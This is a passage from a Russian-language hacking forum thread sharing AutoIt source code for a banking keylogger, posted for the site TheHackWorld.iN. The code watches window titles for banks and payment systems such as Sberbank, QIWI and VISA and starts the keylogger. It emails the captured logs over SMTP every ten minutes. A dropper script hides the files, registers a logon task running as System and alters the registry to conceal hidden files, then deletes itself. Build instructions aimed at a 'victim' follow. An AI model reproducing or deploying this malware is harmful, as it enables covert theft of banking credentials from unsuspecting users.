    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Liberty Reserve </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.libertyreserve.su/ target=blanck>http://www.libertyreserve.su/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("AlertPay.com","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  AlertPay.com </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.alertpay.com/en/Default.aspx target=blanck>https://www.alertpay.com/en/Default.aspx</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("Платежная система","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Платежная система </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.z-payment.ru/ target=blanck>http://www.z-payment.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("RBK Money","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  RBK Money </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://rbkmoney.ru/ target=blanck>https://rbkmoney.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("LiqPAY","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  LiqPAY </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://liqpay.com/ target=blanck>https://liqpay.com/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("Perfect Money","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Perfect Money </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://perfectmoney.com/?lang=ru_RU target=blanck>https://perfectmoney.com/?lang=ru_RU</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("Global Digital Pay","",1) Then
    
    
    продолжение снова ниже.
     
    11 фев 2012
  4. SeOqsss
    SeOqsss Новичок
    Симпатии:
    2
    Код:
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Global Digital Pay </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.globaldigitalpay.com/ target=blanck>https://www.globaldigitalpay.com/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("EasyPay","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  EasyPay </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://ssl.easypay.by/ target=blanck>https://ssl.easypay.by/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("Pecunix","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Pecunix </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.pecunix.com/ target=blanck>http://www.pecunix.com/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("VISA.","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  VISA. </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.visa.com.ru/main.jsp target=blanck>http://www.visa.com.ru/main.jsp</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("MasterCard®","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  MasterCard® </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.mastercard.com/ru/gateway.html target=blanck>http://www.mastercard.com/ru/gateway.html</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("Сбербанк","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Сбербанк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://sberbank.ru target=blanck>http://sberbank.ru</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("Альфа-Банк","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Альфа-Банк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.alfabank.ru/ target=blanck>http://www.alfabank.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("ВТБ24","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  ВТБ24 </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.vtb24.ru/ target=blanck>http://www.vtb24.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("Промсвязьбанк:","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Промсвязьбанк: </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.psbank.ru/ target=blanck>http://www.psbank.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("ПриватБанк","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  ПриватБанк </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://privatbank.ru/ target=blanck>http://privatbank.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
    ElseIf WinWaitActive("QIWI","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  QIWI </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.qiwi.ru/ target=blanck>http://www.qiwi.ru/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
        EndIf
    WEnd
    ; функция отправки письма на почту
    func _inetsmtpmailcom($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject = "", $as_body = "", $s_attachfiles = "", $s_ccaddress = "", $s_bccaddress = "", $s_importance="normal", $s_username = "", $s_password = "", $ipport = 25, $ssl = 0)
        local $objemail = objcreate("cdo.message")
        $objemail.from = '"' & $s_fromname & '" <' & $s_fromaddress & '>'
        $objemail.to = $s_toaddress
        local $i_error = 0
        local $i_error_desciption = ""
        if $s_ccaddress <> "" then $objemail.cc = $s_ccaddress
        if $s_bccaddress <> "" then $objemail.bcc = $s_bccaddress
        $objemail.subject = $s_subject
        if stringinstr($as_body, "<") and stringinstr($as_body, ">") then
            $objemail.htmlbody = $as_body
        else
            $objemail.textbody = $as_body & @crlf
        endif
        if $s_attachfiles <> "" then
            local $s_files2attach = stringsplit($s_attachfiles, ";")
            for $x = 1 to $s_files2attach[0]
                $s_files2attach[$x] = _pathfull($s_files2attach[$x])
                if fileexists($s_files2attach[$x]) then
                    consolewrite('+> file attachment added: ' & $s_files2attach[$x] & @lf)
                    $objemail.addattachment($s_files2attach[$x])
                else
                    consolewrite('!> file not found to attach: ' & $s_files2attach[$x] & @lf)
                    seterror(1)
                    return 0
                endif
            next
        endif
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_smtpserver
        if number($ipport) = 0 then $ipport = 25
        $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $ipport
        if $s_username <> "" then
            $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
            $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_username
            $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_password
        endif
        if $ssl then
            $objemail.configuration.fields.item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = true
        endif
        $objemail.configuration.fields.update
        switch $s_importance
            case "high"
                $objemail.fields.item ("urn:schemas:mailheader:importance") = "high"
            case "normal"
                $objemail.fields.item ("urn:schemas:mailheader:importance") = "normal"
            case "low"
                $objemail.fields.item ("urn:schemas:mailheader:importance") = "low"
        endswitch
        $objemail.fields.update
        $objemail.send
        if @error then
            seterror(2)
            return
        endif
        $objemail=""
    endfunc
    
    Func _quit()
        sleep(1000*60*10) ;указываем промежуток времени через который будет прекращаться запись в лог файл и осуществляться отправка на почтовый ящик(10мин.=(1000*60*10))
    $PID = ProcessExists("wincl.exe") ; вычесляем PID так сказать индетефикационный номер процесса кейлогера
    If $PID Then ProcessClose($PID) ; и убиваем его,хотя можно тупа обойтись одним убийством указав имя нужного процесса
    sleep(500)
    FileOpen($log, 1)
      FileWrite($log, "</body>")
      FileWrite($log, "<b><center><font color=red >&copy; Sw@p Specially for <a href=http://thehackworld.in target=blanck >TheHackWorld.iN</a> </font></center>")
      FileClose($log)
      sleep(500)
    $stext=FileRead(FileOpen($log, 0)); читаем файл лога в переменную которая является телом отправляемого письма
    sleep(1000)
    _inetsmtpmailcom($smtpserver,$fromname,$fromaddress,$toaddress,$subject,$stext,$attachfiles,$ccaddress,$bccaddress,$importance,$username,$password,$ipport,$ssl) ; запускаем функцию отправки письма,тем самым отправляем письмо с логом
    sleep(100)
    FileDelete($log) ; удаляем файл лога и повторяем весь алгоритм скрипта.
    EndFunc
    Следом завершающий скрипт который будет устанавливать данный кейлогер на комп жертвы,его надо будет компилить самым последним,вообщем дальше приведу не большую инструкцию по сборки всего этого добра в один исполняемый файл.
    Сам скрипт alsol.au3
    Код:
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by Sw@p Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
    ;Вирус состоит из трёх скриптов:
    ;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
    ;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
    ;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
    ;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
    ;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
    ;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
    ;                                                                          SwAp Specially for TheHackWorld.iN ©
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    #NoTrayIcon
    #Include <process.au3>
    #include <file.au3>
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Не много об алгоритме данного скрипта(в теле он будет не много раскоменнтирован);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;Алгоритм данного скрипта довольно прост,нету ни каких замарочек с проверками на наличие уже существующих значений или файлов,он тупа сначала удаляет то что может установить(за исключением
    ;ключей реестра),а после устанавливает.
    ;Так как если попытаться заменить любой запущенный файл на другой,то вылетит ошибка,а если перед этим убить его процесс,то ни каких ошибок в процессе установки не будет.
    ;Ну тип как то так,думаю и так понятно что к чему и более подробно расписывать не нужно,ну если вдруг кто чего не допонял,то практически каждое действие в скрипте раскоментированно
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; в данном скрипте не трогаем ни чего,в нём всё норм,он только устанвливает файлы и удаляет себя в последствие ;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    _RunDOS( 'schtasks /delete /tn WanResci /f' ) ; удаляет правило которое запускало данный кейлогер
    sleep(100)
    ProcessClose("stisx.exe") ; убивает процесс который постоянно висит в процессах и детектит заголовки в активных окнах
    sleep(100)
    ProcessClose("wincl.exe") ; так на всякий случай,ну вдруг кейлогер уже запущен и работает
    sleep(100)
    DirRemove(@WindowsDir & "\GTS",1) ;удаляет папку где распаложен кейлогер,можно разумеется и по файлам удалять
    sleep(100)
    DirCreate(@WindowsDir & "\GTS") ; создаёт папку в которую в последствие будут выгружаться и располагаться файлы кейлогера
    sleep(100)
    DirCreate(@WindowsDir & "\swnc"); создаёт папку где будет рапсолагаться файл лога
    sleep(100)
    FileInstall("stisx.exe", @WindowsDir & "\GTS\stisx.exe") ;данная функция выполняет так сказать инсталяцию файлов,то есть при компиляции скрипта она грузит файлы в сам скрипт,а при запуске уже скомпилированного скрипта
    ;она выгружает и так сказать устанавливает файлы заруженные внутрь скрипта.
    sleep(100)
    FileInstall("wincl.exe", @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _RunDOS( 'schtasks /create /tn WanResci /sc ONLOGON /tr ' & @WindowsDir & '\GTS\stisx.exe /ru "System" /f' ) ;создаёт правило используя schtasks,которое будет запускать при каждом входе в систему наш кейлогер
    sleep(10)
    FileSetAttrib ( @WindowsDir & "\GTS", "+S+H") ;ставит атрибуты скриытй и системный на папку в которой находится наш кейлогер
    sleep(100)
    FileSetAttrib ( @WindowsDir & "\swnc", "+H"); ставит атрибут скрытый на папку где распаложен файл лога
    sleep(100)
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0) ; правим реестр,так сказать вносим параметры которы будут скрывать скрытые
    ; и системные файлы даже если в панели управления указать на показ скрытых и защищенных файлов.
    RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","SuperHidden","REG_DWORD",1)
    sleep(100)
    run(@WindowsDir & "\GTS\stisx.exe") ; запускает файл детектора
    sleep(100)
    _scriptdestroy()
    func _scriptdestroy() ; функция само удаления
        $stemp = _tempfile(@tempdir, '~', '.bat'); создаёт bat файл в временной папке и пишет в переменную  $stemp
        $spath = filegetshortname(@scriptfullpath) ;пишет в переменную $spath полный путь и своё имя,только как бы в укороченном варианте,ну все равно понятно системе.
        $hfile = fileopen($stemp, 2) ;пишет в переменную $hfile открытие bat файла
        filewriteline($hfile, '@echo off') ;вписывает в bat файл команды КМД
        filewriteline($hfile, ':loop')
        filewriteline($hfile, 'del ' & $spath)
        filewriteline($hfile, 'if exist ' & $spath & ' goto loop')
        filewriteline($hfile, 'del ' & $stemp)
        fileclose($hfile) ;закрывает bat файл
        run($stemp, '', @sw_hide) ;запускает файл в скрытом режиме
    endfunc  
    Повторюсь(наверное) в скриптах практически все движения расписаны,так что если не ленится и прочитать всё содержимое скриптов то будет всё понятно.
    Перйдём к компиляции и сборки всех скриптов в один исполняемый файл,компилить надо будет в опредлённом порядке,ну по крайней мере последний скрипт надо будет компилить в самую последнию очередь,так как этот скрипт будет паковать два скрипта в себя и при запуске устаналивать его на комп.
    Первым компируем wincl.au3, за ним stisx.au3 и самым последним надо будет компилировать alsol.au3,при компиляции которого два скомпилированный перед этим скрипта должны находится в той же директории что и сам скрипт alsol.au3.
    Скрипты не переименовываем,если же все таки есть желание назвать их по другому то ищите в скриптах соотетствуещие имена и меняйте на свои.
    В итоге мы получаем один исполняемый файл,который будет работать на компе под Windows той архитектуры под которую вы его скомпилируете.

    ©SwAp TheHackWorld.in
     
    11 фев 2012
  5. SeOqsss
    SeOqsss Новичок
    Симпатии:
    2
    11 фев 2012

Поделиться этой страницей

Загрузка...